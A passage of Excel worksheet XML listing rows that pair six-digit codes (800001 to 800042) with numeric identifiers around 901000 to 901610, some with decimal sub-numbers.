    <row r="62" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A62" s="6">
        <v>800042</v>
      </c>
      <c r="B62" s="3">
        <v>901587.00199999998</v>
      </c>
    </row>
    <row r="63" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A63" s="6">
        <v>800042</v>
      </c>
      <c r="B63" s="3">
        <v>901587.00300000003</v>
      </c>
    </row>
    <row r="64" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A64" s="6">
        <v>800042</v>
      </c>
      <c r="B64" s="3">
        <v>901587.00399999996</v>
      </c>
    </row>
    <row r="65" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A65" s="6">
        <v>800042</v>
      </c>
      <c r="B65" s="3">
        <v>901585</v>
      </c>
    </row>
    <row r="66" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A66" s="6">
        <v>800042</v>
      </c>
      <c r="B66" s="3">
        <v>901585.00100000005</v>
      </c>
    </row>
    <row r="67" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A67" s="6">
        <v>800042</v>
      </c>
      <c r="B67" s="3">
        <v>901585.00199999998</v>
      </c>
    </row>
    <row r="68" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A68" s="6">
        <v>800042</v>
      </c>
      <c r="B68" s="3">
        <v>901588</v>
      </c>
    </row>
    <row r="69" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A69" s="6">
        <v>800042</v>
      </c>
      <c r="B69" s="3">
        <v>901588.00100000005</v>
      </c>
    </row>
    <row r="70" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A70" s="6">
        <v>800042</v>
      </c>
      <c r="B70" s="3">
        <v>901588.00199999998</v>
      </c>
    </row>
    <row r="71" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A71" s="6">
        <v>800042</v>
      </c>
      <c r="B71" s="3">
        <v>901588.00300000003</v>
      </c>
    </row>
    <row r="72" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A72" s="6">
        <v>800042</v>
      </c>
      <c r="B72" s="3">
        <v>901588.00399999996</v>
      </c>
    </row>
    <row r="73" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A73" s="6">
        <v>800042</v>
      </c>
      <c r="B73" s="3">
        <v>901588.005</v>
      </c>
    </row>
    <row r="74" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A74" s="6">
        <v>800042</v>
      </c>
      <c r="B74" s="3">
        <v>901588.00600000005</v>
      </c>
    </row>
    <row r="75" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A75" s="6">
        <v>800042</v>
      </c>
      <c r="B75" s="3">
        <v>901608</v>
      </c>
    </row>
    <row r="76" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A76" s="6">
        <v>800042</v>
      </c>
      <c r="B76" s="3">
        <v>901608.00100000005</v>
      </c>
    </row>
    <row r="77" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A77" s="6">
        <v>800042</v>
      </c>
      <c r="B77" s="3">
        <v>901608.00199999998</v>
      </c>
    </row>
    <row r="78" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A78" s="6">
        <v>800042</v>
      </c>
      <c r="B78" s="3">
        <v>901608.00300000003</v>
      </c>
    </row>
    <row r="79" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A79" s="6">
        <v>800042</v>
      </c>
      <c r="B79" s="3">
        <v>901608.00399999996</v>
      </c>
    </row>
    <row r="80" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A80" s="6">
        <v>800042</v>
      </c>
      <c r="B80" s="3">
        <v>901608.005</v>
      </c>
    </row>
    <row r="81" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A81" s="6">
        <v>800001</v>
      </c>
      <c r="B81" s="3">
        <v>901189</v>
      </c>
    </row>
    <row r="82" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A82" s="6">
        <v>800001</v>
      </c>
      <c r="B82" s="3">
        <v>901190</v>
      </c>
    </row>
    <row r="83" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A83" s="6">
        <v>800001</v>
      </c>
      <c r="B83" s="3">
        <v>901133</v>
      </c>
    </row>
    <row r="84" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A84" s="6">
        <v>800001</v>
      </c>
      <c r="B84" s="3">
        <v>901200</v>
      </c>
    </row>
    <row r="85" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A85" s="6">
        <v>800001</v>
      </c>
      <c r="B85" s="3">
        <v>901566</v>
      </c>
    </row>
    <row r="86" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A86" s="6">
        <v>800001</v>
      </c>
      <c r="B86" s="3">
        <v>901566.00100000005</v>
      </c>
    </row>
    <row r="87" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A87" s="6">
        <v>800001</v>
      </c>
      <c r="B87" s="3">
        <v>901566.00199999998</v>
      </c>
    </row>
    <row r="88" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A88" s="6">
        <v>800001</v>
      </c>
      <c r="B88" s="3">
        <v>901566.00300000003</v>
      </c>
    </row>
    <row r="89" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A89" s="6">
        <v>800001</v>
      </c>
      <c r="B89" s="3">
        <v>901091</v>
      </c>
    </row>
    <row r="90" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A90" s="6">
        <v>800001</v>
      </c>
      <c r="B90" s="3">
        <v>901195</v>
      </c>
    </row>
    <row r="91" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A91" s="6">
        <v>800001</v>
      </c>
      <c r="B91" s="3">
        <v>901195.00100000005</v>
      </c>
    </row>
    <row r="92" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A92" s="6">
        <v>800001</v>
      </c>
      <c r="B92" s="3">
        <v>901195.00199999998</v>
      </c>
    </row>
    <row r="93" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A93" s="6">
        <v>800001</v>
      </c>
      <c r="B93" s="3">
        <v>901195.00300000003</v>
      </c>
    </row>
    <row r="94" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A94" s="6">
        <v>800001</v>
      </c>
      <c r="B94" s="3">
        <v>901199</v>
      </c>
    </row>
    <row r="95" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A95" s="6">
        <v>800001</v>
      </c>
      <c r="B95" s="3">
        <v>901078</v>
      </c>
    </row>
    <row r="96" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A96" s="6">
        <v>800001</v>
      </c>
      <c r="B96" s="3">
        <v>901078.00100000005</v>
      </c>
    </row>
    <row r="97" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A97" s="6">
        <v>800001</v>
      </c>
      <c r="B97" s="3">
        <v>901078.00199999998</v>
      </c>
    </row>
    <row r="98" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A98" s="6">
        <v>800001</v>
      </c>
      <c r="B98" s="3">
        <v>901078.00300000003</v>
      </c>
    </row>
    <row r="99" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A99" s="6">
        <v>800001</v>
      </c>
      <c r="B99" s="3">
        <v>901078.00399999996</v>
      </c>
    </row>
    <row r="100" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A100" s="6">
        <v>800002</v>
      </c>
      <c r="B100" s="3">
        <v>901059</v>
      </c>
    </row>
    <row r="101" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A101" s="6">
        <v>800002</v>
      </c>
      <c r="B101" s="3">
        <v>901059.00100000005</v>
      </c>
    </row>
    <row r="102" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A102" s="6">
        <v>800002</v>
      </c>
      <c r="B102" s="3">
        <v>901059.00199999998</v>
      </c>
    </row>
    <row r="103" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A103" s="6">
        <v>800002</v>
      </c>
      <c r="B103" s="3">
        <v>901059.00300000003</v>
      </c>
    </row>
    <row r="104" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A104" s="6">
        <v>800002</v>
      </c>
      <c r="B104" s="3">
        <v>901059.00399999996</v>
      </c>
    </row>
    <row r="105" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A105" s="6">
        <v>800002</v>
      </c>
      <c r="B105" s="3">
        <v>901059.005</v>
      </c>
    </row>
    <row r="106" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A106" s="6">
        <v>800002</v>
      </c>
      <c r="B106" s="3">
        <v>901059.00600000005</v>
      </c>
    </row>
    <row r="107" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A107" s="6">
        <v>800002</v>
      </c>
      <c r="B107" s="3">
        <v>901059.00699999998</v>
      </c>
    </row>
    <row r="108" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A108" s="6">
        <v>800002</v>
      </c>
      <c r="B108" s="3">
        <v>901609</v>
      </c>
    </row>
    <row r="109" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A109" s="6">
        <v>800002</v>
      </c>
      <c r="B109" s="3">
        <v>901610</v>
      </c>
    </row>
    <row r="110" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A110" s="6">
        <v>800002</v>
      </c>
      <c r="B110" s="3">
        <v>901203</v>
      </c>
    </row>
    <row r="111" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A111" s="6">
        <v>800002</v>
      </c>
      <c r="B111" s="3">
        <v>901559</v>
      </c>
    </row>
    <row r="112" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A112" s="6">
        <v>800002</v>
      </c>
      <c r="B112" s="3">
        <v>901559.00100000005</v>
      </c>
    </row>
    <row r="113" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A113" s="6">
        <v>800002</v>
      </c>
      <c r="B113" s="3">
        <v>901559.00199999998</v>
      </c>
    </row>
    <row r="114" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A114" s="6">
        <v>800002</v>
      </c>
      <c r="B114" s="3">
        <v>901106</v>
      </c>
    </row>
    <row r="115" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A115" s="6">
        <v>800002</v>
      </c>
      <c r="B115" s="3">
        <v>901053</v>
      </c>
    </row>
    <row r="116" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A116" s="6">
        <v>800002</v>
      </c>
      <c r="B116" s="3">
        <v>901053.00100000005</v>
      </c>
    </row>
    <row r="117" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A117" s="6">
        <v>800002</v>
      </c>
      <c r="B117" s="3">
        <v>901053.00199999998</v>
      </c>
    </row>
    <row r="118" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A118" s="6">
        <v>800002</v>
      </c>
      <c r="B118" s="3">
        <v>901053.00300000003</v>
      </c>
    </row>
    <row r="119" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A119" s="6">
        <v>800002</v>
      </c>
      <c r="B119" s="3">
        <v>901053.00399999996</v>
      </c>
    </row>
    <row r="120" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A120" s="6">
        <v>800002</v>
      </c>
      <c r="B120" s="3">
        <v>901053.005</v>
      </c>
    </row>
    <row r="121" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A121" s="6">
        <v>800002</v>
      </c>
      <c r="B121" s="3">
        <v>901053.00600000005</v>
      </c>
    </row>
    <row r="122" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A122" s="6">
        <v>800002</v>
      </c>
      <c r="B122" s="3">
        <v>901053.00699999998</v>
      </c>
    </row>
    <row r="123" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A123" s="6">
        <v>800002</v>
      </c>
      <c r="B123" s="3">
        <v>901129</v>
      </c>
    </row>
    <row r="124" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A124" s="6">
        <v>800002</v>
      </c>
      <c r="B124" s="3">
        <v>901072</v>
      </c>
    </row>
    <row r="125" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A125" s="6">
        <v>800002</v>
      </c>
      <c r="B125" s="3">
        <v>901569</v>
      </c>
    </row>
    <row r="126" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A126" s="6">
        <v>800002</v>
      </c>
      <c r="B126" s="3">
        <v>901569.00100000005</v>
      </c>
    </row>
    <row r="127" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A127" s="6">
        <v>800002</v>
      </c>
      <c r="B127" s="3">
        <v>901569.00199999998</v>
      </c>
    </row>
    <row r="128" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A128" s="6">
        <v>800002</v>
      </c>
      <c r="B128" s="3">
        <v>901047</v>
      </c>
    </row>
    <row r="129" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A129" s="6">
        <v>800003</v>
      </c>
      <c r="B129" s="3">
        <v>901098</v>
      </c>
    </row>
    <row r="130" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A130" s="6">
        <v>800003</v>
      </c>
      <c r="B130" s="3">
        <v>901098.00100000005</v>
      </c>
    </row>
    <row r="131" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A131" s="6">
        <v>800003</v>
      </c>
      <c r="B131" s="3">
        <v>901098.00199999998</v>
      </c>
    </row>
    <row r="132" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A132" s="6">
        <v>800003</v>
      </c>
      <c r="B132" s="3">
        <v>901098.00300000003</v>
      </c>
    </row>
    <row r="133" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A133" s="6">
        <v>800003</v>
      </c>
      <c r="B133" s="3">
        <v>901098.00399999996</v>
      </c>
    </row>
    <row r="134" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A134" s="6">
        <v>800003</v>
      </c>
      <c r="B134" s="3">
        <v>901197</v>
      </c>
    </row>
    <row r="135" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A135" s="6">
        <v>800003</v>
      </c>
      <c r="B135" s="3">
        <v>901547</v>
      </c>
    </row>
    <row r="136" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A136" s="6">
        <v>800003</v>
      </c>
      <c r="B136" s="3">
        <v>901547.00100000005</v>
      </c>
    </row>
    <row r="137" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A137" s="6">
        <v>800003</v>
      </c>
      <c r="B137" s="3">
        <v>901547.00199999998</v>
      </c>
    </row>
    <row r="138" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A138" s="6">
        <v>800003</v>
      </c>
      <c r="B138" s="3">
        <v>901547.00300000003</v>
      </c>
    </row>
    <row r="139" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A139" s="6">
        <v>800003</v>
      </c>
      <c r="B139" s="3">
        <v>901547.00399999996</v>
      </c>
    </row>
    <row r="140" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A140" s="6">
        <v>800003</v>
      </c>
      <c r="B140" s="3">
        <v>901547.005</v>
      </c>
    </row>
    <row r="141" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A141" s="6">
        <v>800003</v>
      </c>
      <c r="B141" s="3">
        <v>901547.00600000005</v>
      </c>
    </row>
    <row r="142" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A142" s="6">
        <v>800003</v>
      </c>
      <c r="B142" s="3">
        <v>901547.00699999998</v>
      </c>
    </row>
    <row r="143" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A143" s="6">
        <v>800003</v>
      </c>
      <c r="B143" s="3">
        <v>901547.00800000003</v>
      </c>
    </row>
    <row r="144" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A144" s="6">
        <v>800003</v>
      </c>
      <c r="B144" s="3">
        <v>901547.00899999996</v>
      </c>
    </row>
    <row r="145" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A145" s="6">
        <v>800003</v>
      </c>
      <c r="B145" s="3">
        <v>901547.01</v>
      </c>
    </row>
    <row r="146" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A146" s="6">
        <v>800003</v>
      </c>
      <c r="B146" s="3">
        <v>901547.01100000006</v>
      </c>
    </row>
    <row r="147" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A147" s="6">
        <v>800003</v>
      </c>
      <c r="B147" s="3">
        <v>901547.01199999999</v>
      </c>
    </row>
    <row r="148" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A148" s="6">
        <v>800003</v>
      </c>
      <c r="B148" s="3">
        <v>901547.01300000004</v>
      </c>
    </row>
    <row r="149" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A149" s="6">
        <v>800003</v>
      </c>
      <c r="B149" s="3">
        <v>901547.01399999997</v>
      </c>
    </row>
    <row r="150" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A150" s="6">
        <v>800003</v>
      </c>
      <c r="B150" s="3">
        <v>901547.01500000001</v>
      </c>
    </row>
    <row r="151" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A151" s="6">
        <v>800003</v>
      </c>
      <c r="B151" s="3">
        <v>901037</v>
      </c>
    </row>
    <row r="152" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A152" s="6">
        <v>800003</v>
      </c>
      <c r="B152" s="3">
        <v>901037.00100000005</v>
      </c>
    </row>
    <row r="153" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A153" s="6">
        <v>800003</v>
      </c>
      <c r="B153" s="3">
        <v>901037.00199999998</v>
      </c>
    </row>
    <row r="154" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A154" s="6">
        <v>800003</v>
      </c>
      <c r="B154" s="3">
        <v>901037.00300000003</v>
      </c>
    </row>
    <row r="155" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A155" s="6">
        <v>800003</v>
      </c>
      <c r="B155" s="3">
        <v>901037.00399999996</v>
      </c>
    </row>
    <row r="156" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A156" s="6">
        <v>800003</v>
      </c>
      <c r="B156" s="3">
        <v>901037.005</v>
      </c>
    </row>
    <row r="157" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A157" s="6">
        <v>800003</v>
      </c>
      <c r="B157" s="3">
        <v>901176</v>
      </c>
    </row>
    <row r="158" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A158" s="6">
        <v>800003</v>
      </c>
      <c r="B158" s="3">
        <v>901554</v>
      </c>
    </row>
    <row r="159" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A159" s="6">
        <v>800003</v>
      </c>
      <c r="B159" s="3">
        <v>901136</v>
      </c>
    </row>
    <row r="160" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A160" s="6">
        <v>800003</v>
      </c>
      <c r="B160" s="3">
        <v>901543</v>
      </c>
    </row>
    <row r="161" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A161" s="6">
        <v>800003</v>
      </c>
      <c r="B161" s="3">
        <v>901543.00100000005</v>
      </c>
    </row>
    <row r="162" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A162" s="6">
        <v>800003</v>
      </c>
      <c r="B162" s="3">
        <v>901543.00199999998</v>
      </c>
    </row>
    <row r="163" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A163" s="6">
        <v>800003</v>
      </c>
      <c r="B163" s="3">
        <v>901543.00300000003</v>
      </c>
    </row>
    <row r="164" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A164" s="6">
        <v>800003</v>
      </c>
      <c r="B164" s="3">
        <v>901543.00399999996</v>
      </c>
    </row>
    <row r="165" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A165" s="6">
        <v>800003</v>
      </c>
      <c r="B165" s="3">
        <v>901546</v>
      </c>
    </row>
    <row r="166" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A166" s="6">
        <v>800003</v>
      </c>
      <c r="B166" s="3">
        <v>901546.00100000005</v>
      </c>
    </row>
    <row r="167" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A167" s="6">
        <v>800003</v>
      </c>
      <c r="B167" s="3">
        <v>901546.00199999998</v>
      </c>
    </row>
    <row r="168" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A168" s="6">
        <v>800003</v>
      </c>
      <c r="B168" s="3">
        <v>901546.00300000003</v>
      </c>
    </row>
    <row r="169" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A169" s="6">
        <v>800003</v>
      </c>
      <c r="B169" s="3">
        <v>901546.00399999996</v>
      </c>
    </row>
    <row r="170" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A170" s="6">
        <v>800003</v>
      </c>
      <c r="B170" s="3">
        <v>901546.005</v>
      </c>
    </row>
    <row r="171" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A171" s="6">
        <v>800003</v>
      </c>
      <c r="B171" s="3">
        <v>901546.00600000005</v>
      </c>
    </row>
    <row r="172" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A172" s="6">
        <v>800003</v>
      </c>
      <c r="B172" s="3">
        <v>901546.00699999998</v>
      </c>
    </row>
    <row r="173" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A173" s="6">
        <v>800003</v>
      </c>
      <c r="B173" s="3">
        <v>901546.00800000003</v>
      </c>
    </row>
    <row r="174" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A174" s="6">
        <v>800003</v>
      </c>
      <c r="B174" s="3">
        <v>901546.00899999996</v>
      </c>
    </row>
    <row r="175" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A175" s="6">
        <v>800003</v>
      </c>
      <c r="B175" s="3">
        <v>901546.01</v>
      </c>
    </row>
    <row r="176" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A176" s="6">
        <v>800003</v>
      </c>
      <c r="B176" s="3">
        <v>901546.01100000006</v>
      </c>
    </row>
    <row r="177" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A177" s="6">
        <v>800003</v>
      </c>
      <c r="B177" s="3">
        <v>901546.01199999999</v>
      </c>
    </row>
    <row r="178" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A178" s="6">
        <v>800003</v>
      </c>
      <c r="B178" s="3">
        <v>901546.01300000004</v>
      </c>
    </row>
    <row r="179" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A179" s="6">
        <v>800003</v>
      </c>
      <c r="B179" s="3">
        <v>901546.01399999997</v>
      </c>
    </row>
    <row r="180" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A180" s="6">
        <v>800003</v>
      </c>
      <c r="B180" s="3">
        <v>901546.01500000001</v>
      </c>
    </row>
    <row r="181" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A181" s="6">
        <v>800003</v>
      </c>
      <c r="B181" s="3">
        <v>901133</v>
      </c>
    </row>
    <row r="182" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A182" s="6">
        <v>800003</v>
      </c>
      <c r="B182" s="3">
        <v>901574</v>
      </c>
    </row>
    <row r="183" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A183" s="6">
        <v>800003</v>
      </c>
      <c r="B183" s="3">
        <v>901574.00100000005</v>
      </c>
    </row>
    <row r="184" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A184" s="6">
        <v>800003</v>
      </c>
      <c r="B184" s="3">
        <v>901574.00199999998</v>
      </c>
    </row>
    <row r="185" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A185" s="6">
        <v>800003</v>
      </c>
      <c r="B185" s="3">
        <v>901574.00399999996</v>
      </c>
    </row>
    <row r="186" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A186" s="6">
        <v>800003</v>
      </c>
      <c r="B186" s="3">
        <v>901574.005</v>
      </c>
    </row>
    <row r="187" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A187" s="6">
        <v>800003</v>
      </c>
      <c r="B187" s="3">
        <v>901574.00600000005</v>
      </c>
    </row>
    <row r="188" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A188" s="6">
        <v>800003</v>
      </c>
      <c r="B188" s="3">
        <v>901574.00699999998</v>
      </c>
    </row>
    <row r="189" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A189" s="6">
        <v>800003</v>
      </c>
      <c r="B189" s="3">
        <v>901574.00800000003</v>
      </c>
    </row>
    <row r="190" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A190" s="6">
        <v>800003</v>
      </c>
      <c r="B190" s="3">
        <v>901574.00899999996</v>
      </c>
    </row>
    <row r="191" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A191" s="6">
        <v>800003</v>
      </c>
      <c r="B191" s="3">
        <v>901574.01</v>
      </c>
    </row>
    <row r="192" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A192" s="6">
        <v>800003</v>
      </c>
      <c r="B192" s="3">
        <v>901574.01100000006</v>
      </c>
    </row>
    <row r="193" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A193" s="6">
        <v>800003</v>
      </c>
      <c r="B193" s="3">
        <v>901574.01199999999</v>
      </c>
    </row>
    <row r="194" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A194" s="6">
        <v>800003</v>
      </c>
      <c r="B194" s="3">
        <v>901525</v>
      </c>
    </row>
    <row r="195" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A195" s="6">
        <v>800003</v>
      </c>
      <c r="B195" s="3">
        <v>901556</v>
      </c>
    </row>
    <row r="196" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A196" s="6">
        <v>800003</v>
      </c>
      <c r="B196" s="3">
        <v>901556.00100000005</v>
      </c>
    </row>
    <row r="197" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A197" s="6">
        <v>800003</v>
      </c>
      <c r="B197" s="3">
        <v>901556.00199999998</v>
      </c>
    </row>
    <row r="198" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A198" s="6">
        <v>800003</v>
      </c>
      <c r="B198" s="3">
        <v>901556.00300000003</v>
      </c>
    </row>
    <row r="199" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A199" s="6">
        <v>800003</v>
      </c>
      <c r="B199" s="3">
        <v>901556.00399999996</v>
      </c>
    </row>
    <row r="200" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A200" s="6">
        <v>800003</v>
      </c>
      <c r="B200" s="3">
        <v>901137</v>
      </c>
    </row>
    <row r="201" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A201" s="6">
        <v>800003</v>
      </c>
      <c r="B201" s="3">
        <v>901542</v>
      </c>
    </row>
    <row r="202" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A202" s="6">
        <v>800003</v>
      </c>
      <c r="B202" s="3">
        <v>901542.00100000005</v>
      </c>
    </row>
    <row r="203" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A203" s="6">
        <v>800003</v>
      </c>
      <c r="B203" s="3">
        <v>901542.00199999998</v>
      </c>
    </row>
    <row r="204" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A204" s="6">
        <v>800003</v>
      </c>
      <c r="B204" s="3">
        <v>901542.00300000003</v>
      </c>
    </row>
    <row r="205" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A205" s="6">
        <v>800003</v>
      </c>
      <c r="B205" s="3">
        <v>901542.00399999996</v>
      </c>
    </row>
    <row r="206" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A206" s="6">
        <v>800003</v>
      </c>
      <c r="B206" s="3">
        <v>901542.005</v>
      </c>
    </row>
    <row r="207" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A207" s="6">
        <v>800003</v>
      </c>
      <c r="B207" s="3">
        <v>901053</v>
      </c>
    </row>
    <row r="208" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A208" s="6">
        <v>800003</v>
      </c>
      <c r="B208" s="3">
        <v>901053.00100000005</v>
      </c>
    </row>
    <row r="209" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A209" s="6">
        <v>800003</v>
      </c>
      <c r="B209" s="3">
        <v>901053.00199999998</v>
      </c>
    </row>
    <row r="210" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A210" s="6">
        <v>800003</v>
      </c>
      <c r="B210" s="3">
        <v>901053.00300000003</v>
      </c>
    </row>
    <row r="211" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A211" s="6">
        <v>800003</v>
      </c>
      <c r="B211" s="3">
        <v>901053.00399999996</v>
      </c>
    </row>
    <row r="212" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A212" s="6">
        <v>800003</v>
      </c>
      <c r="B212" s="3">
        <v>901053.005</v>
      </c>
    </row>
    <row r="213" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A213" s="6">
        <v>800003</v>
      </c>
      <c r="B213" s="3">
        <v>901053.00600000005</v>
      </c>
    </row>
    <row r="214" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A214" s="6">
        <v>800003</v>
      </c>
      <c r="B214" s="3">
        <v>901053.00699999998</v>
      </c>
    </row>
    <row r="215" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A215" s="6">
        <v>800003</v>
      </c>
      <c r="B215" s="3">
        <v>901505</v>
      </c>
    </row>
    <row r="216" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A216" s="6">
        <v>800003</v>
      </c>
      <c r="B216" s="3">
        <v>901505.00100000005</v>
      </c>
    </row>
    <row r="217" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A217" s="6">
        <v>800003</v>
      </c>
      <c r="B217" s="3">
        <v>901505.00199999998</v>
      </c>
    </row>
    <row r="218" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A218" s="6">
        <v>800003</v>
      </c>
      <c r="B218" s="3">
        <v>901505.00300000003</v>
      </c>
    </row>
    <row r="219" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A219" s="6">
        <v>800003</v>
      </c>
      <c r="B219" s="3">
        <v>901505.00399999996</v>
      </c>
    </row>
    <row r="220" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A220" s="6">
        <v>800003</v>
      </c>
      <c r="B220" s="3">
